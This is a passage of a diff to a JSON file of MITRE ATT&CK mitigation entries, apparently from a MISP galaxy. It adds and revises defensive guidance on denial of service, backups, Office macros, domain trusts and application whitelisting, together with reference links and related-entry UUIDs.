out the attack traffic from the legitimate traffic. Such defenses can be provided by the hosting Internet Service Provider (ISP) or by a 3rd party such as a Content Delivery Network (CDN) or providers specializing in DoS mitigations.(Citation: CERT-EU DDoS March 2017)\n\nDepending on flood volume, on-premises filtering may be possible by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.(Citation: CERT-EU DDoS March 2017)\n\nAs immediate response may require rapid engagement of 3rd parties, analyze the risk associated to critical resources being affected by Network DoS attacks and create a disaster recovery plan/business continuity plan to respond to incidents.(Citation: CERT-EU DDoS March 2017)", + "meta": { + "external_id": "T1498", + "refs": [ + "https://attack.mitre.org/techniques/T1498", + "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf" + ] + }, + "related": [ + { + "dest-uuid": "d74c4a7e-ffbf-432f-9365-7ebf1f787cab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + } + ], + "uuid": "654addf1-47ab-410a-8578-e1a0dc2a49b8", + "value": "Network Denial of Service Mitigation - T1498" + }, + { + "description": "Leverage services provided by Content Delivery Networks (CDN) or providers specializing in DoS mitigations to filter traffic upstream from services.(Citation: CERT-EU DDoS March 2017) Filter boundary traffic by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport. To defend against SYN floods, enable SYN Cookies.", + "meta": { + "external_id": "T1499", + "refs": [ + "https://attack.mitre.org/techniques/T1499", + "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf" + ] + }, + "related": [ + { + "dest-uuid": "c675646d-e204-4aa8-978d-e3d6d65885c4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + } + ], + "uuid": "82c21600-ccb6-4232-8c04-ef3792b56628", + "value": "Endpoint Denial of Service Mitigation - T1499" + }, { "description": "Application developers should use device-provided credential storage mechanisms such as Android's KeyStore or iOS's KeyChain. These can prevent credentials from being exposed to an adversary.", "meta": { @@ -1209,9 +1277,9 @@ { "description": "Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system users, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", "meta": { - "external_id": "T1033", + "external_id": "T1482", "refs": [ - "https://attack.mitre.org/techniques/T1033", + "https://attack.mitre.org/techniques/T1482", "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599", "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", "https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", @@ -1226,10 +1294,17 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "mitigates" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" } ], "uuid": "16f144e4-c780-4ed2-98b4-55d14e2dfa44", - "value": "System Owner/User Discovery Mitigation - T1033" + "value": "System Owner/User Discovery Mitigation - T1482" }, { "description": "Identify unnecessary system utilities or potentially malicious software that may be used to acquire information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", @@ -1295,90 +1370,6 @@ ], "type": "mitigates" }, - { - "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "fd339382-bfec-4bf0-8d47-1caedc9e7e57", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "8f0e39c6-82c9-41ec-9f93-5696c0f2e274", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "82f04b1e-5371-4a6f-be06-411f0f43b483", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "ef771e03-e080-43b4-a619-ac6f84899884", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "cde2cb84-455e-410c-8aa9-086f2788bcd2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "3b0b604f-10db-41a0-b54c-493124d455b9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "dfe29258-ce59-421c-9dee-e85cb9fa90cd", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "88932a8c-3a17-406f-9431-1da3ff19f6d6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, { "dest-uuid": "2204c371-6100-4ae0-82f3-25c07c29772a", "tags": [ @@ -1387,21 +1378,7 @@ "type": "mitigates" }, { - "dest-uuid": "29e07491-8947-43a3-8d4e-9a787c45f3d3", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "2d646840-f6f5-4619-a5a8-29c8316bbac5", + "dest-uuid": "cde2cb84-455e-410c-8aa9-086f2788bcd2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1421,6 +1398,34 @@ ], "type": "mitigates" }, + { + "dest-uuid": "29e07491-8947-43a3-8d4e-9a787c45f3d3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "3b0b604f-10db-41a0-b54c-493124d455b9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "2d646840-f6f5-4619-a5a8-29c8316bbac5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, { "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", "tags": [ @@ -1429,7 +1434,7 @@ "type": "mitigates" }, { - "dest-uuid": "667e5707-3843-4da8-bd34-88b922526f0d", + "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1441,6 +1446,76 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "mitigates" + }, + { + "dest-uuid": "1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "8f0e39c6-82c9-41ec-9f93-5696c0f2e274", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "82f04b1e-5371-4a6f-be06-411f0f43b483", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "dfe29258-ce59-421c-9dee-e85cb9fa90cd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "ef771e03-e080-43b4-a619-ac6f84899884", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "88932a8c-3a17-406f-9431-1da3ff19f6d6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "667e5707-3843-4da8-bd34-88b922526f0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" } ], "uuid": "0beabf44-e8d8-4ae4-9122-ef56369a2564", @@ -1682,7 +1757,7 @@ "value": "Graphical User Interface Mitigation - T1061" }, { - "description": "Grant access to application deployment systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multifactor authentication. Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network. Patch deployment systems regularly to prevent potential remote access through [Exploitation of Vulnerability](https://attack.mitre.org/techniques/T1068). \n\nIf the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.", + "description": "Grant access to application deployment systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multifactor authentication. Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network. Patch deployment systems regularly to prevent potential remote access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068). \n\nIf the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.", "meta": { "external_id": "T1017", "refs": [ @@ -1748,7 +1823,7 @@ "value": "Remote System Discovery Mitigation - T1018" }, { - "description": "Identify or block potentially malicious software that may contain abusive functionality by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP). These mechanisms can also be used to disable and/or limit user access to Windows utilities used to invoke execution.", + "description": "Identify or block potentially malicious software that may contain abusive functionality by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP). These mechanisms can also be used to disable and/or limit user access to Windows utilities and file types/locations used to invoke malicious execution.(Citation: SpectorOPs SettingContent-ms Jun 2018)", "meta": { "external_id": "T1202", "refs": [ @@ -1757,7 +1832,8 @@ "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", "https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx", - "https://technet.microsoft.com/en-us/library/ee791851.aspx" + "https://technet.microsoft.com/en-us/library/ee791851.aspx", + "https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39" ] }, "related": [ @@ -1834,6 +1910,31 @@ "uuid": "a569295c-a093-4db4-9fb4-7105edef85ad", "value": "Custom Cryptographic Protocol Mitigation - T1024" }, + { + "description": "This type of technique cannot be easily mitigated with preventive controls or patched since it is based on the abuse of operating system design features. For example, blocking all file compilation may have unintended side effects, such as preventing legitimate OS frameworks and code development mechanisms from operating properly. Consider removing compilers if not needed, otherwise efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.\n\nIdentify unnecessary system utilities or potentially malicious software that may be used to decrypt, deobfuscate, decode, and compile files or information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "meta": { + "external_id": "T1502", + "refs": [ + "https://attack.mitre.org/techniques/T1502", + "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599", + "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx", + "https://technet.microsoft.com/en-us/library/ee791851.aspx" + ] + }, + "related": [ + { + "dest-uuid": "cf7b3a06-8b42-4c33-bbe9-012120027925", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + } + ], + "uuid": "ae56a49d-5281-45c5-ab95-70a1439c338e", + "value": "Compile After Delivery Mitigation - T1502" + }, { "description": "Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about the operating system and underlying hardware, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", "meta": { @@ -1972,6 +2073,32 @@ "uuid": "ba2ec548-fb75-4b8c-88d6-d91a77a943cf", "value": "Windows Management Instrumentation Mitigation - T1047" }, + { + "description": "Consider technical controls to prevent the disabling of services or deletion of files involved in system recovery. \n\nConsider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.\n\nIdentify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)", + "meta": { + "external_id": "T1490", + "refs": [ + "https://attack.mitre.org/techniques/T1490", + "https://www.ready.gov/business/implementation/IT", + "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599", + "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx", + "https://technet.microsoft.com/en-us/library/ee791851.aspx" + ] + }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + } + ], + "uuid": "bb25b897-bfc7-4128-839d-52e9764dbfa6", + "value": "Inhibit System Recovery Mitigation - T1490" + }, { "description": "Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports. \n\nNetwork intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)", "meta": { @@ -1998,7 +2125,8 @@ "meta": { "external_id": "T1075", "refs": [ - "https://attack.mitre.org/techniques/T1075" + "https://attack.mitre.org/techniques/T1075", + "https://github.com/iadgov/Secure-Host-Baseline/blob/master/Windows/Group%20Policy%20Templates/en-US/SecGuide.adml" ] }, "related": [ @@ -2384,14 +2512,16 @@ "value": "Network Share Discovery Mitigation - T1135" }, { - "description": "Follow Office macro security best practices suitable for your environment. Disable Office VBA macros from executing. Even setting to disable with notification could enable unsuspecting users to execute potentially malicious macros. (Citation: TechNet Office Macro Security)\n\nFor the Office Test method, create the Registry key used to execute it and set the permissions to \"Read Control\" to prevent easy access to the key without administrator permissions or requiring Privilege Escalation. (Citation: Palo Alto Office Test Sofacy)\n\nDisable Office add-ins. If they are required, follow best practices for securing them by requiring them to be signed and disabling user notification for allowing add-ins. For some add-ins types (WLL, VBA) additional mitigation is likely required as disabling add-ins in the Office Trust Center does not disable WLL nor does it prevent VBA code from executing. (Citation: MRWLabs Office Persistence Add-ins)", + "description": "Follow Office macro security best practices suitable for your environment. Disable Office VBA macros from executing. Even setting to disable with notification could enable unsuspecting users to execute potentially malicious macros. (Citation: TechNet Office Macro Security)\n\nFor the Office Test method, create the Registry key used to execute it and set the permissions to \"Read Control\" to prevent easy access to the key without administrator permissions or requiring Privilege Escalation. (Citation: Palo Alto Office Test Sofacy)\n\nDisable Office add-ins. If they are required, follow best practices for securing them by requiring them to be signed and disabling user notification for allowing add-ins. For some add-ins types (WLL, VBA) additional mitigation is likely required as disabling add-ins in the Office Trust Center does not disable WLL nor does it prevent VBA code from executing. (Citation: MRWLabs Office Persistence Add-ins)\n\nFor the Outlook methods, blocking macros may be ineffective as the Visual Basic engine used for these features is separate from the macro scripting engine.(Citation: SensePost Outlook Forms) Microsoft has released patches to try to address each issue. Ensure KB3191938 which blocks Outlook Visual Basic and displays a malicious code warning, KB4011091 which disables custom forms by default, and KB4011162 which removes the legacy Home Page feature, are applied to systems.(Citation: SensePost Outlook Home Page)", "meta": { "external_id": "T1137", "refs": [ "https://attack.mitre.org/techniques/T1137", + "https://blogs.technet.microsoft.com/mmpc/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/", "https://researchcenter.paloaltonetworks.com/2016/07/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/", "https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/", - "https://blogs.technet.microsoft.com/mmpc/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/" + "https://sensepost.com/blog/2017/outlook-forms-and-shells/", + "https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/" ] }, "related": [ @@ -2407,18 +2537,18 @@ "value": "Office Application Startup Mitigation - T1137" }, { - "description": "Registry keys specific to Microsoft Office feature control security can be set to disable automatic DDE/OLE execution. (Citation: Microsoft DDE Advisory Nov 2017) (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: GitHub Disable DDEAUTO Oct 2017) Microsoft also created Registry keys to completely disable DDE execution in Word and Excel. (Citation: Microsoft ADV170021 Dec 2017)\n\nEnsure Protected View is enabled (Citation: Microsoft Protected View) and consider disabling embedded files in Office programs, such as OneNote, not enrolled in Protected View. (Citation: Enigma Reviving DDE Jan 2018) (Citation: GitHub Disable DDEAUTO Oct 2017)\n\nOn Windows 10, enable Attack Surface Reduction (ASR) rules to prevent DDE attacks and spawning of child processes from Office programs. (Citation: Microsoft ASR Nov 2017) (Citation: Enigma Reviving DDE Jan 2018)", + "description": "Registry keys specific to Microsoft Office feature control security can be set to disable automatic DDE/OLE execution. (Citation: Microsoft DDE Advisory Nov 2017) (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: GitHub Disable DDEAUTO Oct 2017) Microsoft also created, and enabled by default, Registry keys to completely disable DDE execution in Word and Excel. (Citation: Microsoft ADV170021 Dec 2017)\n\nEnsure Protected View is enabled (Citation: Microsoft Protected View) and consider disabling embedded files in Office programs, such as OneNote, not enrolled in Protected View. (Citation: Enigma Reviving DDE Jan 2018) (Citation: GitHub Disable DDEAUTO Oct 2017)\n\nOn Windows 10, enable Attack Surface Reduction (ASR) rules to prevent DDE attacks and spawning of child processes from Office programs. (Citation: Microsoft ASR Nov 2017) (Citation: Enigma Reviving DDE Jan 2018)", "meta": { "external_id": "T1173", "refs": [ "https://attack.mitre.org/techniques/T1173", "https://technet.microsoft.com/library/security/4053440", - "https://support.office.com/en-us/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653", "https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/", "https://gist.github.com/wdormann/732bb88d9b5dd5a66c9f1e1498f31a1b", + "https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021", + "https://support.office.com/en-us/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653", "https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee", - "https://docs.microsoft.com/windows/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction", - "https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021" + "https://docs.microsoft.com/windows/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction" ] }, "related": [ @@ -2496,13 +2626,14 @@ "value": "Spearphishing via Service Mitigation - T1194" }, { - "description": "Apply supply chain risk management (SCRM) practices and procedures (Citation: MITRE SE Guide 2014), such as supply chain analysis and appropriate risk management, throughout the life-cycle of a system.\n\nLeverage established software development lifecycle (SDLC) practices (Citation: NIST Supply Chain 2012): \n\n* Uniquely Identify Supply Chain Elements, Processes, and Actors\n* Limit Access and Exposure within the Supply Chain\n* Establish and Maintain the Provenance of Elements, Processes, Tools, and Data\n* Share Information within Strict Limits\n* Perform SCRM Awareness and Training\n* Use Defensive Design for Systems, Elements, and Processes\n* Perform Continuous Integrator Review\n* Strengthen Delivery Mechanisms\n* Assure Sustainment Activities and Processes\n* Manage Disposal and Final Disposition Activities throughout the System or Element Life Cycle", + "description": "Apply supply chain risk management (SCRM) practices and procedures (Citation: MITRE SE Guide 2014), such as supply chain analysis and appropriate risk management, throughout the life-cycle of a system.\n\nLeverage established software development lifecycle (SDLC) practices (Citation: NIST Supply Chain 2012): \n\n* Uniquely Identify Supply Chain Elements, Processes, and Actors\n* Limit Access and Exposure within the Supply Chain\n* Establish and Maintain the Provenance of Elements, Processes, Tools, and Data\n* Share Information within Strict Limits\n* Perform SCRM Awareness and Training\n* Use Defensive Design for Systems, Elements, and Processes\n* Perform Continuous Integrator Review\n* Strengthen Delivery Mechanisms\n* Assure Sustainment Activities and Processes\n* Manage Disposal and Final Disposition Activities throughout the System or Element Life Cycle\n\nA patch management process should be implemented to check unused dependencies, unmaintained and/or previously vulnerable dependencies, unnecessary features, components, files, and documentation. Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well. (Citation: OWASP Top 10 2017)", "meta": { "external_id": "T1195", "refs": [ "https://attack.mitre.org/techniques/T1195", "https://www.mitre.org/sites/default/files/publications/se-guide-book-interactive.pdf", - "http://dx.doi.org/10.6028/NIST.IR.7622" + "http://dx.doi.org/10.6028/NIST.IR.7622", + "https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf" ] }, "related": [ @@ -2623,12 +2754,150 @@ "value": "Compiled HTML File Mitigation - T1223" }, { - "description": "Disable LLMNR and NetBIOS in local computer security settings or by group policy if they are not needed within an environment. (Citation: ADSecurity Windows Secure Baseline)\n\nUse host-based security software to block LLMNR/NetBIOS traffic.", + "description": "Map the trusts within existing domains/forests and keep trust relationships to a minimum. Employ network segmentation for sensitive domains.(Citation: Harmj0y Domain Trusts)", + "meta": { + "external_id": "T1482", + "refs": [ + "https://attack.mitre.org/techniques/T1482", + "http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ " + ] + }, + "related": [ + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + } + ], + "uuid": "159b4ee4-8fa1-44a5-b095-2973f3c7e25e", + "value": "Domain Trust Discovery Mitigation - T1482" + }, + { + "description": "Identify critical business and system processes that may be targeted by adversaries and work to secure the data related to those processes against tampering. least privilege principles are applied to important information resources to reduce exposure to data manipulation risk. Consider encrypting important information to reduce an adversaries ability to perform tailor data modifications. Where applicable, examine using file monitoring software to check integrity on important files and directories as well as take corrective actions when unauthorized changes are detected. \n\nConsider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and manipulate backups.", + "meta": { + "external_id": "T1492", + "refs": [ + "https://attack.mitre.org/techniques/T1492", + "https://www.ready.gov/business/implementation/IT" + ] + }, + "related": [ + { + "dest-uuid": "0bf78622-e8d2-41da-a857-731472d61a92", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + } + ], + "uuid": "e9362d25-4427-446b-99e8-b8f0c3b86615", + "value": "Stored Data Manipulation Mitigation - T1492" + }, + { + "description": "This technique may be difficult to mitigate since the domains can be registered just before they are used, and disposed shortly after. Malware researchers can reverse-engineer malware variants that use DGAs and determine future domains that the malware will attempt to contact, but this is a time and resource intensive effort.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA Brute Force) Malware is also increasingly incorporating seed values that can be unique for each instance, which would then need to be determined to extract future generated domains. In some cases, the seed that a particular sample uses can be extracted from DNS traffic.(Citation: Akamai DGA Mitigation) Even so, there can be thousands of possible domains generated per day; this makes it impractical for defenders to preemptively register all possible C2 domains due to the cost. In some cases a local DNS sinkhole may be used to help prevent DGA-based command and control at a reduced cost.\n\nNetwork intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)", + "meta": { + "external_id": "T1483", + "refs": [ + "https://attack.mitre.org/techniques/T1483", + "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf", + "https://umbrella.cisco.com/blog/2015/02/18/at-high-noon-algorithms-do-battle/", + "https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html", + "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + ] + }, + "related": [ + { + "dest-uuid": "54456690-84de-4538-9101-643e26437e09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + } + ], + "uuid": "3bd2cf87-1ceb-4317-9aee-3e7dc713261b", + "value": "Domain Generation Algorithms Mitigation - T1483" + }, + { + "description": "Identify critical business and system processes that may be targeted by adversaries and work to secure communications related to those processes against tampering. Encrypt all important data flows to reduce the impact of tailored modifications on data in transit.", + "meta": { + "external_id": "T1493", + "refs": [ + "https://attack.mitre.org/techniques/T1493" + ] + }, + "related": [ + { + "dest-uuid": "cc1e737c-236c-4e3b-83ba-32039a626ef8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + } + ], + "uuid": "245075bc-f992-4d89-af8c-834c53d403f4", + "value": "Transmitted Data Manipulation Mitigation - T1493" + }, + { + "description": "Identify and correct GPO permissions abuse opportunities (ex: GPO modification privileges) using auditing tools such as Bloodhound (version 1.5.1 and later)(Citation: GitHub Bloodhound).\n\nConsider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.(Citation: Wald0 Guide to GPOs)(Citation: Microsoft WMI Filters)(Citation: Microsoft GPO Security Filtering)", + "meta": { + "external_id": "T1484", + "refs": [ + "https://attack.mitre.org/techniques/T1484", + "https://github.com/BloodHoundAD/BloodHound", + "https://wald0.com/?p=179", + "https://blogs.technet.microsoft.com/askds/2008/09/11/fun-with-wmi-filters-in-group-policy/", + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/Policy/filtering-the-scope-of-a-gpo" + ] + }, + "related": [ + { + "dest-uuid": "ebb42bbe-62d7-47d7-a55f-3b08b61d792d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + } + ], + "uuid": "2108b914-eee1-45cc-8840-36272b19596a", + "value": "Group Policy Modification Mitigation - T1484" + }, + { + "description": "Identify critical business and system processes that may be targeted by adversaries and work to secure those systems against tampering. Prevent critical business and system processes from being replaced, overwritten, or reconfigured to load potentially malicious code. Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)", + "meta": { + "external_id": "T1494", + "refs": [ + "https://attack.mitre.org/techniques/T1494", + "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599", + "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx", + "https://technet.microsoft.com/en-us/library/ee791851.aspx" + ] + }, + "related": [ + { + "dest-uuid": "ca205a36-c1ad-488b-aa6c-ab34bdd3a36b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + } + ], + "uuid": "337172b1-b003-4034-8a3f-1d89a71da628", + "value": "Runtime Data Manipulation Mitigation - T1494" + }, + { + "description": "Disable LLMNR and 